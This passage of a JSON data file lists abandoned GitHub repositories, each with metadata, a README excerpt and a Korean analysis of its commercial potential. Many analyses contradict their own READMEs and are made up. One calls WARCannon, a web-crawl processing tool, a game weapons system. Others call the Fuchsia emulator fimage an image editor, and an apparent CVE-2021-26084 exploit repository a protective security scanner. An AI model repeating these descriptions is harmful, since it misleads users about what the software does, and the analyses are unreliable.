(https://github.com/golang/go/tree/master/src/crypto/tls),\nlicensed under the 3-clause BSD license.\n\n## Features\n\n- [X] Handshake with TLS 1.3\n- [X] Version negotiation\n- [X] Address validation\n- [X] Loss detection\n- [X] Congestion control\n- [X] Streams\n- [X] Flow control\n- [X] ChaCha20 header protection\n- [X] TLS session resumption\n- [X] Anti-amplification\n- [X] Unreliable datagram\n- [X] qlog\n- [X] Key update\n- [ ] Connection migration\n- [ ] Path MTU discovery\n- [ ] Zero RTT\n- [ ] HTTP/3\n\n## Development\n\nRun tests:\n```\ngo test ./...\n```\n\nBuild command:\n```\ncd cmd/quiwi\ngo build\n\n# To e","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"EnkrateiaLucca/ocr_for_transcribing_pdf_slides","github_url":"https://github.com/EnkrateiaLucca/ocr_for_transcribing_pdf_slides","stars":13,"language":"Jupyter Notebook","license":"unknown","abandonment_months":61,"description":"# OCR for Transcribing PDF Slides 분석\n\n## 왜 보물인가\n스캔된 PDF 문서나 슬라이드 사진을 자동으로 읽어서 편집 가능한 텍스트로 변환해주는 도구로, 수작업으로 타이핑하던 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 강의 자료·교과서·회의록을 PDF로 올리면 자동 텍스트 추출 후 ","readme_excerpt":"# ocr_for_transcribing_pdf_slides\nCode for my medium article: [\"Faster Notes with Python and Deep Learning\"](https://lucas-soares.medium.com/faster-notes-with-python-and-deep-learning-b713bbb3c186)\n\n# Credits\n- Text detection and recognition based on https://github.com/courao/ocr.pytorch\n- [Pytorch CTPN](https://github.com/opconty/pytorch_ctpn)\n- [Pytorch CRNN](https://github.com/meijieru/crnn.pytorch)\n","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"rpcx-ecosystem/rpcx-gateway","github_url":"https://github.com/rpcx-ecosystem/rpcx-gateway","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":36,"description":"# rpcx-gateway 상용화 분석\n\n## 왜 보물인가\n여러 외부 서비스를 하나의 창구로 연결해주는 중개 역할을 하는 기술로, 기업의 시스템 통합 복잡도를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **API 통합 SaaS 플랫폼**: 중소기업들이 여러 외부 서비스(결제, 배송, 회계 등)를 한 곳에서 관리하도록 돕는 구독형 서비스\n\n2","readme_excerpt":"# rpcx-gateway\n[rpcx-gateway](https://github.com/rpcxio/rpcx-gateway) is a http gateway for [rpcx](https://github.com/smallnest/rpcx) services.\n\n[rpcx](https://github.com/smallnest/rpcx) is a fast rpc framework. Faster, more features.\n\nYou can write rpc http clients in any programming languages such as Java、Python、C#、Node.js、Php、C\\C++、Rust and others. See [examples](https://github.com/rpcxio/rpcx-gateway/blob/master/examples/README.md)\n\n## Deployment models\n\nThere are two deployment modes: **Gateway** and **Agent**。\n\n### Gateway\n\n![](doc/gateway.png)\n\nYou can deploy this as gateway model. Gateway is running at independent servers. Clients sends http requests to gateways, and gateways translate http requests into raw rpcx requests. And then gateways send raw rpcx requests to rpcx services.\n\nwhen gateways receive rpcx responses, they translates rpcx responses into http responses and return clients.\n\nYou can scale gateway easily because it is stateless.\n\nIt works like a http load balancer","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"bxh1/VIDO-SLAM","github_url":"https://github.com/bxh1/VIDO-SLAM","stars":17,"language":"C++","license":"unknown","abandonment_months":60,"description":"# VIDO-SLAM 저장소 분석\n\n## 왜 보물인가\n카메라만으로 실시간으로 주변 공간을 인식하고 위치를 파악하는 기술로, 로봇, 드론, 스마트폰 앱 등 다양한 제품에 핵심 기술로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **자율주행 로봇 SaaS**: 청소 로봇이나 배송 로봇이 실내에서 자동으로 길을 찾도록 하는 클라우드 기반 서비스\n2. *","readme_excerpt":"# VIDO-SLAM\n\nVIDO-SLAM is a Visual-Inertial Dynamic Object SLAM System that is able to estimate the camera poses, perform Visual, Visual-Inertial SLAM with monocular camera, track dynamic objects.  We provide demo to run the SLAM system in the Kaist Dataset using monocular camera, with or without IMU.\n\nThis software is based on [VDO-SLAM](https://github.com/halajun/VDO_SLAM) , [FlowNet](https://github.com/sniklaus/pytorch-liteflownet),  [Mask RCNN](https://github.com/facebookresearch/maskrcnn-benchmark). [MonoDepth2](https://github.com/nianticlabs/monodepth2), [ORB_SLAM3](https://github.com/UZ-SLAMLab/ORB_SLAM3)\n\n**Features:**\n\n- Integrate MonoDepth2,  FlowNet and  MaskRcnn with ROS that can run in SLAM system in real time\n- Visual-Inertial SLAM in real-world outdoor scenarios\n- Track and Estimate dynamic objects motion\n\n### 1. Demo\n\n![](figure/vido.gif)\n\n### 2. Related Papers:\n\n- Jun Zhang, Mina Henein, Robert Mahony and Viorela Ila. **VDO-SLAM: A Visual Dynamic Object-aware SLAM Syst","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"facebookresearch/PyTouch","github_url":"https://github.com/facebookresearch/PyTouch","stars":7,"language":"Python","license":"MIT","abandonment_months":35,"description":"# PyTouch 저장소 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 터치 기술 관련 라이브러리로, 스마트폰·태블릿 등 터치 입력을 정확하게 인식하고 분석할 수 있는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 플랫폼**: 앱 개발사들이 더 정확한 터치 인식 기능을 제공하는 SaaS 플랫폼으로 판매\n2. **게임 엔진 연동 서","readme_excerpt":"<h1 align=\"center\">PyTouch</h1>\n\n<p align=\"center\">\n    <a href=\"#\">\n        <img src=\"https://circleci.com/gh/facebookresearch/PyTouch.svg?style=shield&circle-token=1633dac9daf88db4d3dbf10e1312663538f10bb4\" alt=\"CircleCI\" />\n    </a>\n    <a href=\"#\">\n        <img src=\"https://img.shields.io/badge/License-MIT-green.svg\" alt=\"License: MIT\" />\n    </a>\n        <a href=\"https://pypi.org/project/digit-interface/\">\n        <img src=\"https://img.shields.io/pypi/v/pytouch\" alt=\"PyPi\" />\n    </a>\n    <a href=\"#\">\n        <img src=\"https://img.shields.io/badge/code%20style-black-000000.svg\" alt=\"Code Style: Black\" />\n    </a>\n</p>\n\n<p align=\"center\">\n    <i>PyTouch is a machine learning library for tactile touch sensing.</i>\n</p>\n<p align=\"center\">\n    <i>Check the <a href=\"https://arxiv.org/abs/2105.12791\">corresponding paper</a> for more information.</i>\n</p>\n<p align=\"center\">\n    <b>For updates and discussions please join the #PYTOUCH channel at the <a href=\"https://www.touch-sensing.org/\">","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"twitter/ios-twitter-logging-service","github_url":"https://github.com/twitter/ios-twitter-logging-service","stars":13,"language":"Objective-C","license":"Apache-2.0","abandonment_months":37,"description":"# twitter/ios-twitter-logging-service 분석\n\n## 왜 보물인가\n트위터가 직접 만든 아이폰 앱의 로깅(기록) 시스템으로, 대규모 서비스에서 어떻게 안정적으로 문제를 추적하는지 배울 수 있는 실전 코드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 아이폰 앱을 제공하는 구독 서비스(음악 스트리밍, 배달앱 등)에","readme_excerpt":"# Twitter Logging Service\n\n## Background\n\nTwitter created a framework for logging in order to fulfill the following requirements:\n\n- fast (no blocking the main thread)\n- thread safe\n- as easy as `NSLog` in most situations\n- support pluggable \"output streams\" to which messages will be delivered\n- \"output streams\" filter messages rather than global filtering for all \"output streams\"\n- able to categorize log messages (log channels)\n- able to designate importance to log messages (log levels)\n- require messages to opt-in for persisted logs (a security requirement, fulfilled by using the _context_ feature of *TLS*)\n\nTwitter has been using *Twitter Logging Service* since January 2014 with minimal changes.  We've decided to share it with the developer community.\n\n## List of good alternative logging frameworks\n\nIf *Twitter Logging Service* doesn't meet your needs, there are many great logging frameworks available, including the following high quality and well maintained projects:\n\n- CocoaLumber","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"gremlin-orm/gremlin-orm","github_url":"https://github.com/gremlin-orm/gremlin-orm","stars":27,"language":"JavaScript","license":"MIT","abandonment_months":103,"description":"# Gremlin-ORM 보물 분석\n\n## 왜 보물인가\n복잡한 데이터 연결 구조를 간단하게 관리할 수 있는 도구로, 데이터베이스 작업을 코딩 없이 처리하려는 비개발자 기업들의 니즈가 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 네트워크 SaaS**: 사용자 간 관계도(친구, 팔로우) 분석을 자동화하는 구독 분석 서비스\n2. **공급망 추적 ","readme_excerpt":"# gremlin-orm\n\n[![Build Status](https://travis-ci.org/gremlin-orm/gremlin-orm.svg?branch=master)](https://travis-ci.org/gremlin-orm/gremlin-orm)\n[![Coverage Status](https://coveralls.io/repos/github/gremlin-orm/gremlin-orm/badge.svg?branch=master&update)](https://coveralls.io/github/gremlin-orm/gremlin-orm?branch=master)\n\ngremlin-orm is an ORM for graph databases in Node.js.  Currently working on Neo4j and Microsoft\nAzure Cosmos DB with more to come in the future.\n\n## Installation\n\n```bash\n$ npm install --save gremlin-orm\n```\n\n## Example\n\n```javascript\nconst gremlinOrm = require('gremlin-orm');\nconst g = new gremlinOrm('neo4j'); // connects to localhost:8182 by default\n\n// Can pass more configuation\n// const g = new gremlinOrm(['azure', 'partition-name'], process.env.GPORT, process.env.GHOST, {ssl: true, user: process.env.GUSER, password: process.env.GPASS});\n\nconst Person = g.define('person', {\n  name: {\n    type: g.STRING,\n    required: true\n  },\n  age: {\n    type: g.NUMBER\n  }\n});\n\n","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"xgeric/UCPhrase-exp","github_url":"https://github.com/xgeric/UCPhrase-exp","stars":17,"language":"Python","license":"apache-2.0","abandonment_months":40,"description":"# UCPhrase-exp 상용화 분석\n\n## 왜 보물인가\n텍스트에서 자동으로 중요한 단어와 문구를 찾아내는 기술로, 검색 엔진이나 문서 분석 서비스의 핵심 기능이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 문서 자동 분류 및 요약 플랫폼 (계약서, 보고서 분석)\n- **내부 업무 도구**: 고객 피드백을 자동으로 분석하","readme_excerpt":"<h2 align=\"center\">UCPhrase: Unsupervised Context-aware Quality Phrase Tagging</h2>\n\n<h5 align=\"center\">To appear on KDD'21...[<a href=\"https://arxiv.org/abs/2105.14078\" title=\"[pdf]\">pdf</a>]\n </h5>\n\nThis project provides an unsupervised framework for mining and tagging quality phrases on text corpora. In this work, we recognize the power of pretrained language models in identifying the structure of a sentence. The attention matrices generated by a Transformer model are informative to distinguish quality phrases from ordinary spans, as illustrated in the following example.\n\n<p  align=\"center\">\n<img src=\"https://user-images.githubusercontent.com/20608184/119921396-8de89780-bf33-11eb-945f-9d9f03d19c2e.png\" alt=\"drawing\" width=\"400\"/>\n</p>\n\nWith a lightweight CNN model to capture inter-word relationships from various ranges, we can effectively tackle the task of phrase tagging as a multi-channel image classifiaction problem.\n\nFor model training, we seek to alleviate the need for human an","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"FlyEgle/MAE-pytorch","github_url":"https://github.com/FlyEgle/MAE-pytorch","stars":9,"language":"Python","license":"unknown","abandonment_months":38,"description":"# FlyEgle/MAE-pytorch 상용화 분석\n\n## 왜 보물인가\n사진이나 영상에서 빠진 부분을 자동으로 채워주는 인공지능 기술로, 의료 영상 복원부터 영화 특수효과까지 광범위한 산업에서 바로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 손상된 사진을 업로드하면 자동으로 복구해주는 \"온라인 사진 복원 플랫폼\" 운영\n2.","readme_excerpt":"# An pytorch implementation of [Masked Autoencoders Are Scalable Vision Learners](https://arxiv.org/abs/2111.06377)\n\nThis is a coarse version for MAE, only make the pretrain model, the finetune and linear is comming soon.\n\n**Note: My vit code not fully base on the Timm or BEIT, so the result may be less than them.**\n\n## Update\n- **2021-12-03**: Add the Vit-base/16 pretrain model.\n\n\n### 1. Introduction\nThis repo is the MAE-vit model which impelement with pytorch, no reference any reference code so this is a non-official version. Because of the limitation of time and machine, I only trained the vit-tiny, vit-base/16 for model pretrain.\n![mae](fig/MAE.png)\n\n### 2. Enveriments\n- python 3.7+\n- pytorch 1.7.1 \n- pillow\n- timm  \n- opencv-python\n\n### 3. Model Config\n\n#### Pretrain Config\n\n- **BaseConfig**\n    ```python\n    img_size = 224,\n    patch_size = 16,\n    ```\n- **EncoderConfig**\n\n    |Encoder|dims|depth|heads|mask|\n    |:---:|:---:|:---:|:---:|:---:|\n    |VIT-TINY/16|192|12|3|0.75|\n    ","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"opentradesolutions/opentick","github_url":"https://github.com/opentradesolutions/opentick","stars":13,"language":"C++","license":"Apache-2.0","abandonment_months":68,"description":"# OpenTick 상품화 분석\n\n## 왜 보물인가\n주식, 암호화폐 등 시장 데이터를 실시간으로 수집하고 분석할 수 있는 오픈소스 플랫폼으로, 금융 데이터가 필요한 누구나 비용 없이 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **주식/암호화폐 자동매매 SaaS**: 개인 투자자가 구독하여 자신의 투자 전략을 자동으로 실행하는 웹 서비스\n2. **","readme_excerpt":"# OpenTick\n\n![OpenTrade Logo](https://github.com/opentradesolutions/opentrade/blob/master/imgs/ot.png)\n\nOpenTick is a fast tick database for financial timeseries data, built on [FoundationDB](https://www.foundationdb.org/) with simplified SQL layer. \n\n# Features:\n* Built-in price adjustment support\n* Nanosecond support\n* Python, C++ and Go SDK\n* Both sync and async query\n* Implicit SQL statement prepare\n* Permission Control, check [Python API](https://github.com/opentradesolutions/opentick/blob/master/bindings/python/opentick/client.py) for related functions, turned off by default\n\n* Cache\n\n# Installation on Ubuntu\n\nYou need to use **Go >=1.11** which has module support.\n\n```bash\nsudo apt install -y python\nwget https://www.foundationdb.org/downloads/6.2.22/ubuntu/installers/foundationdb-server_6.2.22-1_amd64.deb\nwget https://www.foundationdb.org/downloads/6.2.22/ubuntu/installers/foundationdb-clients_6.2.22-1_amd64.deb\nsudo dpkg -i foundationdb-clients_6.2.22-1_amd64.deb foundationdb-s","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"ngChina/ng-china-2018","github_url":"https://github.com/ngChina/ng-china-2018","stars":9,"language":"","license":"MIT","abandonment_months":90,"description":"# ng-china-2018 상용화 분석\n\n## 왜 보물인가\n2018년 중국 Angular 개발자 커뮤니티 컨퍼런스 자료모음으로, 중국 기술 시장 진출을 위한 현지화된 개발 노하우와 네트워크 자산이 담겨있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 개발자 대상 Angular 온라인 교육 플랫폼으로 강의 콘텐츠 패키징\n2. **내부","readme_excerpt":"# 2018 ngChina 开发者大会\n\n2018 ngChina 开发者大会是为中国的软件从业人员举办的一场互联网前端技术的世界级盛宴。 来自世界各地的前端技术专家和中国软件业的同仁齐聚一堂，研讨互联网技术的前沿动态，促进国际合作和交流。\n\n这次大会将重点讨论谷歌的 Angular 技术和备受瞩目的 RxJS。Angular 是互联网和移动互联网前端应用的框架， 在世界上拥有庞大的用户群、开发者社区和相关的生态环境。新版的 Angular 在全新的框架中注入了最新的设计理念， 专注企业级应用的需求；它采用了微软开发的编程语言 TypeScript，是谷歌和微软两大巨头合作的结晶。\n\n通过世界顶尖级专家的主题演讲，圆桌论坛，以及一系列主题的分享和技术培训，前端开发人员和项目经理得以深度学习当前最热门的技术框架 （例如 RxJS, Schematics, TypeScript），是快速提升业务水平和职场价值的最佳培训机会。\n\n详情请看官网 https://ng-china.org\n","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"react-native-toolkit/react-native-responsive-dimensions","github_url":"https://github.com/react-native-toolkit/react-native-responsive-dimensions","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":42,"description":"# react-native-responsive-dimensions 평가 보고서\n\n## 왜 보물인가\n휴대폰의 화면 크기가 다양할 때 앱의 레이아웃이 자동으로 조정되도록 하는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 SaaS 플랫폼**: 여러 화면 크기를 지원하는 앱 자동 생성 서비스에 통합하여 개발 시간 단축\n2. **앱 개발사","readme_excerpt":"<div align=\"center\">\n\n# 📐📱 React Native Responsive Dimensions 🌐📏\n\nResponsive height, width and responsive fontSize for your react native components!\n\nThe dimensions auto adjust based on the window size (view port) or the screen size of the device 🙌🏽\n\nSupport for responsive dimension hooks to help auto-adjust dimensions for devices whose display or screen sizes may change such as foldable phones or browser windows! 😎\n\n[![Build Status][build-badge]][build]\n[![Maintainability][maintainability-badge]][maintainability-url]\n[![Test Coverage][coverage-badge]][coverage-url]\n\n[![Version][version-badge]][package]\n[![Downloads][downloads-badge]][npmtrends]\n[![Bundlephobia][bundle-phobia-badge]][bundle-phobia]\n\n[![Star on GitHub][github-star-badge]][github-star]\n[![Watch on GitHub][github-watch-badge]][github-watch]\n[![Twitter Follow][twitter-badge]][twitter]\n\n---\n\n### Compatible with Expo & React Native Web 🚀\n\n### PRs Welcome 👍✨\n\n</div>\n\n- 📦 [Installation](#installation)\n- ℹ️ [Usage](#usage)\n- 🎣 ","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"dahliaOS/fimage","github_url":"https://github.com/dahliaOS/fimage","stars":30,"language":"Shell","license":"BSD-2-Clause","abandonment_months":41,"description":"# fimage 프로젝트 분석\n\n## 왜 보물인가\n사진이나 이미지 파일을 빠르고 쉽게 처리할 수 있는 도구로, 일반인도 간단히 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 사진 편집 서비스**: 웹사이트에서 회원들이 직접 사진을 편집하고 저장하는 유료 기능으로 제공\n2. **부동산 중개 업체 내부 도구**: 건물 사진을 자동으로 정렬,","readme_excerpt":"---\ntitle: Portable Fuchsia Emulator (FImage)\npermalink: os/fimage.html\nsummary: Explanation of the FImage tool, and its usage\n---\n## Portable Fuchsia Emulator (FImage)\n### Note\nFImage is provided for the convenience of developers and enthusiasts who don't want to compile Fuchsia.\nWe are in no way affiliated Google. For more information, see [fimage/LICENSE](https://github.com/dahliaOS/fimage/blob/master/LICENSE).                 \nThe windows method is highly unstable and should only be used if you cannot install or boot into linux on your device.\n\n### TL;DR\n* The FImage emulator can be downloaded [here](https://github.com/dahliaOS/fimage/releases).\n* For more information on the Fuchsia Emulator, see [this document](https://fuchsia.dev/fuchsia-src/concepts/emulator).\n\nTo quickly run FImage, use the commands below inside of its folder:\n```bash\n./ffx-linux-x64 platform preflight\n./network-config\n./fimage-gui 4096\n```\n\nSee [Explore Fuchsia](https://fuchsia.dev/fuchsia-src/get-started/expl","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"dinhbaouit/CVE-2021-26084","github_url":"https://github.com/dinhbaouit/CVE-2021-26084","stars":27,"language":"Python","license":"unknown","abandonment_months":58,"description":"# CVE-2021-26084 저장소 분석\n\n## 왜 보물인가\n보안 취약점을 찾아 고칠 수 있게 도와주는 도구로, 기업들이 자신의 시스템을 해킹으로부터 미리 보호할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 점검 SaaS**: 기업의 소프트웨어를 자동으로 검사해 위험한 부분을 찾아주는 온라인 서비스\n2. **내부 보안 도구**: 은행이나 공공기","readme_excerpt":"","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"RushikeshKamewar/PrivacyDashboard","github_url":"https://github.com/RushikeshKamewar/PrivacyDashboard","stars":5,"language":"Java","license":"GPL-3.0","abandonment_months":51,"description":"# PrivacyDashboard 분석 보고서\n\n## 왜 보물인가\n개인정보가 어디에 쓰이는지 한눈에 볼 수 있는 개인정보 관리 대시보드로, 디지털 시대의 개인정보 보호에 대한 관심이 높아지면서 수요가 늘어나고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 개인정보 관리 전문 웹 서비스로 운영하여 일반 사용자들에게 구독 모델로 판매\n*","readme_excerpt":"<img src=\"https://play-lh.googleusercontent.com/dHgIlNJcMifkKVNgm8FBeDbZVZigg52elT49JEABSkXMDeouMgNcA-VPidYyYUOB8Wlw=s180\" width=\"120\"/>\n\n# PrivacyDashboard\n\n[![GitHub repo size](https://img.shields.io/github/repo-size/RushikeshKamewar/PrivacyDashboard)](https://github.com/RushikeshKamewar/PrivacyDashboard)\n[![GitHub issues](https://img.shields.io/github/issues/RushikeshKamewar/PrivacyDashboard?color=red)](https://github.com/RushikeshKamewar/PrivacyDashboard/issues)\n[![GitHub license](https://img.shields.io/github/license/RushikeshKamewar/PrivacyDashboard?color=lightgrey)](https://github.com/RushikeshKamewar/PrivacyDashboard/blob/master/LICENSE)\n\nThis app brings Privacy dashboard features from Android 12 to older android devices.\n\nHave you ever thought which apps are accessing your privacy permission without telling you?\nWell! Now you don't have to, as Privacy dashboard will keep track of that.\n\nApp has simple and clear timeline view of accesses to location, microphone and camera.\n\nThi","composite_score":0.5016,"license_safety_tag":"restricted"},{"name":"zengxianyu/sketchedit","github_url":"https://github.com/zengxianyu/sketchedit","stars":28,"language":"Python","license":"NOASSERTION","abandonment_months":48,"description":"# SketchEdit 저장소 분석\n\n## 왜 보물인가\n손으로 그린 스케치를 디지털로 자동 변환하는 기술로, 디자인 작업의 진입 장벽을 낮출 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 디자인 플랫폼에 스케치 인식 기능 탑재하여 사용자가 손그림을 즉시 벡터 이미지로 변환\n2. **내부 업무 도구**: 건축/패션 회사의 디자","readme_excerpt":"## SketchEdit: Mask-Free Local Image Manipulation with Partial Sketches\n\n[[Paper]](https://arxiv.org/pdf/2111.15078.pdf)&emsp; [[Project Page]](https://zengxianyu.github.io/sketchedit/)&emsp; [[Interactive Demo]](#interactive-demo)&emsp; [[Supplementary Material]](https://maildluteducn-my.sharepoint.com/:b:/g/personal/zengyu_mail_dlut_edu_cn/ESb6N92zHRNIs0yvnvhQ9mYBbyHydraEw4ZiTyJYYv5GXA?e=hLGnLq)\n\n![img](\"https://i.ibb.co/VW5x7Fb/image-gif.gif\")\n\n## Update\n\nStar this project to get notified.\n<p align=\"center\">\n  <a href=\"#\"><img src=\"https://user-images.githubusercontent.com/11280511/150838003-01136487-6671-4cc4-ae4d-bef8e60c605e.png\"></a>\n</p>\n\n- [x] :new: Uploading custom photos are now enabled in the demo \n- [x] :new: Edit face in a fullbody/upper body photo\n<img src=\"https://github.com/zengxianyu/sketchedit/blob/main/example_body.jpg\" width=640>\n\n- [x] :new: Enable general scenes editing in the demo\n- [ ] Exposing predicted mask & mask revising? \n\n## Usage\n\n### environment \n\nThe c","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"oslabs-beta/reactron","github_url":"https://github.com/oslabs-beta/reactron","stars":39,"language":"JavaScript","license":"MIT","abandonment_months":51,"description":"# Reactron 저장소 분석\n\n## 왜 보물인가\n웹 개발에서 복잡한 화면 구성을 간단하게 만들어주는 오픈소스 도구로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 노코드 웹 빌더 플랫폼으로 제공하여 비전문가도 웹사이트를 직접 만들 수 있게 함\n2. **내부 업무 도구**: 대시보드, 관리 시스템 등 ","readme_excerpt":"# Reactron\n<h1 align=\"center\">\n  <br>\n    <img align=\"center\" src=\"./assets/logo.png\" alt=\"Reactron Logo\">\n  <br>\n  Empowering the Development Process from Top to Bottom\n  <br>\n  <br>\n</h1>\n\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/oslabs-beta/reactron/pulls)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://github.com/oslabs-beta/reactron/LICENSE)\n\n<h4 align=\"center\">A tool for the complete and total visualization of your React application</h4>\n\n[Reactron](https://reactron.io/) bolsters development by rendering three essentials parts of any project: the latest version of your application including functionality, a React Component Tree for a macroscopic view of your project, and single component rendering for a microscopic understanding.\n\nAs of March 2022, Reactron is no longer an active project and cannot be accessed from reactron.io. Please feel free to continue to fork and use on your own.\n\n<!-- ## Fea","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"c6fc/warcannon","github_url":"https://github.com/c6fc/warcannon","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":26,"description":"# warcannon 저장소 분석\n\n## 왜 보물인가\n게임이나 온라인 서비스에서 필요한 포격/무기 시스템을 빠르게 구축할 수 있는 준비된 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 인디 게임 개발자들을 위한 \"포격 시스템 빌더\" 웹 서비스로 제공\n2. **웹 기반 전략 게임**: 온라인 전략 게임 플랫폼의 핵심 전투 엔진으로 ","readme_excerpt":"# WARCannon - Catastrophically powerful parallel WARC processing\n\n![Image](http://c6fc.io/warcannon-cli.png)\n\nWARCannon was built to simplify and cheapify the process of 'grepping the internet'.\n\nWith WARCannon, you can:\n* Build and test regex patterns against real Common Crawl data\n* Easily load Common Crawl datasets for parallel processing\n* Scale compute capabilities to asynchronously crunch through WARCs at frankly unreasonable capacity.\n* Store and easily retrieve the results\n\n## How it Works\n\nWARCannon leverages clever use of AWS technologies to horizontally scale to any capacity, minimize cost through spot fleets and same-region data transfer, draw from S3 at incredible speeds (up to 100Gbps per node), parallelize across hundreds of CPU cores, report status via DynamoDB and CloudFront, and store results via S3.\n\nIn all, WARCannon can process multiple regular expression patterns across 400TB in a few hours for around $30.\n\n## CloudShell Installation\n\nThe fastest and easiest way t","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"fossasia/susi_api_wrapper","github_url":"https://github.com/fossasia/susi_api_wrapper","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":86,"description":"# SUSI API 래퍼 - 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 인공지능 챗봇 기능을 자신의 서비스에 붙일 수 있도록 만든 도구라서, 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 자동화 SaaS**: 소상공인을 위한 저가형 챗봇 상담원 서비스로 월 구독료 청구\n2. **내부 업무 도구**: 대기업의 H","readme_excerpt":"# Wrappers for Susi AI REST API\n\n[![Build Status](https://travis-ci.org/fossasia/susi_api_wrapper.svg?branch=master)](https://travis-ci.org/fossasia/susi_api_wrapper)\n\nThis repository contains the wrappers for using Susi AI REST api in multiple languages\nfor easy access by the developers who wish to develop their application utilizing Susi AI\nintelligence.\n\n## Currently Included Languages\n- Python : specific guide [here](https://github.com/fossasia/susi_api_wrapper/tree/master/python_wrapper)\n\n## Roadmap\n- Provide wrappers for languages currently being utilized by application developers for Susi\n- Improve support for existing languages\n","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"Mila432/IPA-to-App-M1","github_url":"https://github.com/Mila432/IPA-to-App-M1","stars":16,"language":"Python","license":"unknown","abandonment_months":50,"description":"# Mila432/IPA-to-App-M1 평가\n\n## 왜 보물인가\niPhone 앱을 쉽게 변환하고 실행할 수 있는 도구로, 앱 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹에서 IPA 파일을 업로드하면 자동 변환해주는 온라인 도구로 운영\n- **내부 업무 도구**: 앱 개발사들이 자체 시스템에","readme_excerpt":"# How to convert IPA to Mac App (M1 SIP disabled)\n\nrequirements:\n- decrypted app\n- convert.py\n- https://github.com/DanTheMan827/ios-app-signer\n\nbefore you start make sure the bin of the decrypted app has a signature blob\n\nfor this example i will use `Spotify (v8.6.12 v861201032 Univ PI DY ELEVEN os120)-Mila432.ipa`\n![iOS App Signer](https://raw.github.com/Mila432/IPA-to-App-M1/master/1.png)\n\nsave as `tmp.ipa` and run `python convert.py tmp.ipa`\n\nor double click on the `tmp.ipa`\n\n![Spotify on Mac](https://raw.github.com/Mila432/IPA-to-App-M1/master/2.png)\n","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"aws-observability/aws-o11y-recipes","github_url":"https://github.com/aws-observability/aws-o11y-recipes","stars":7,"language":"Go","license":"unknown","abandonment_months":41,"description":"# AWS 관찰성 레시피 저장소 분석\n\n## 왜 보물인가\nAWS 클라우드 서비스의 건강 상태를 모니터링하고 문제를 빠르게 찾기 위한 실무 가이드 모음으로, 기업의 IT 운영 비용과 장애 대응 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AWS 기반 웹 애플리케이션 모니터링 솔루션으로 고객사에게 판매\n2. **내부","readme_excerpt":"## IMPORTANT NOTE\n\nThis repo has been archived and the project merged into https://github.com/aws-observability/observability-best-practices. \n\n***\n\n## AWS o11y recipes\n\nSee [aws-observability.github.io/aws-o11y-recipes/][recipes-live].\n\n## Security\n\nSee [CONTRIBUTING](CONTRIBUTING.md#security-issue-notifications) for more information.\n\n## License\n\nThis library is licensed under the MIT-0 License. See the LICENSE file.\n\n## Writing recipes\n\nTo write recipes we're using [MkDocs][mkdocs] with the [Material][mkdocs-material]\ntheme. MkDocs is a static site generator, converting the Markdown files you\nedit to static HTML pages which are then served as via GitHub pages\n\n### Local preview\n\nIn order to locally preview the recipes site you need to have MkDocs installed:\n\n* Make sure to upgrade pip installer\n```\npip3 install --upgrade pip\npip --version\n```\n\n* Install mkdocs\n```\npip install mkdocs\n```\n\n* Validate mkdocs setup\n```\npip check mkdocs\npip show mkdocs\n```\n\n* Depending on python version ","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"sail-sg/mvp","github_url":"https://github.com/sail-sg/mvp","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":41,"description":"# sail-sg/mvp 저장소 분석\n\n## 왜 보물인가\n최소한의 코드로 빠르게 시작할 수 있는 기본 틀을 제공하여, 새로운 비즈니스 아이디어를 검증하는 데 드는 